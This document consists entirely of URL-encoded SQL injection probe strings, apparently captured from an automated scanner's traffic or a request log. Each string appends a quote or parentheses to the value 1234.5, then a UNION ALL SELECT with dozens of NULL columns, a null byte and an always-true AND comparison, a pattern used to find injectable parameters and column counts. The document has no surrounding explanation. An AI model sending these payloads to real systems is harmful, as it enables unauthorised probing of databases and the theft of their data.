1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281778%3D1778 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%286951%3D6951 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%288227%3D8227 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%285872%3D5872 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%282477%3D2477 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%285708%3D5708 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284266%3D4266 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%285628%3D5628 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281672%3D1672 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%285450%3D5450 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%286940%3D6940 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282638%3D2638 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%286041%3D6041 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281229%3D1229 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%289552%3D9552 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284152%3D4152 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%283305%3D3305 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284455%3D4455 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281560%3D1560 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%287762%3D7762 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282355%3D2355 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284315%3D4315 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281724%3D1724 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%289248%3D9248 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284334%3D4334 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%283933%3D3933 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%288980%3D8980 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%289161%3D9161 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%289792%3D9792 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%289156%3D9156 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 